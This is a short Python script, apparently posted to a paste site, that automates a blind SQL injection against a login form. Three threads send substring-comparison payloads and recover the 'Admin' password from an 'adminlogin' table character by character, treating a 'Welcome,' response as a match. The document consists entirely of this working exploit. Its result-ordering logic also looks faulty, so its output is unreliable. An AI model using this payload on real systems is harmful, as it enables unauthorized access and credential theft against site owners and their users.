Untitled
unknown
plain_text
2 years ago
1.6 kB
4
Indexable
import requests
from threading import Thread
def ThreadJob(x,p,result):
#victim's url containing a login form vulnerable to Blind SQLi
url = "http://localhost:1234"
while True :
for i in x:
exploit = "' or substring((SELECT password FROM adminlogin WHERE username='Admin'),"+ str(p) +",1) ='" + i + "' -- -"
data = {'username' : exploit , 'password' : 'aaa' }
#sending a post request containing our exploit
r = requests.post(url=url, data=data)
#test if the caracter is correct
if ("Welcome," in r.text):
result.insert(p,i)
print (result)
break
elif (i == x[25]):
break
p+=1
def main():
result = []
#testing for lowercase
liste1="azertyuiopqsdfghjklmwxcvbn"
#testing for uppercase
liste2="AZERTYUIOPMLKJHGFDSQWXCVBN"
#testing for numbers + special caracters
liste3="1234567890(-_)}]@|[{#~*%$?"
#creating threads
t1 = Thread(target=ThreadJob, args=(liste1,1,result,))
t2 = Thread(target=ThreadJob, args=(liste2,1,result,))
t3 = Thread(target=ThreadJob, args=(liste3,1,result,))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
print (result)
main()
Editor is loading...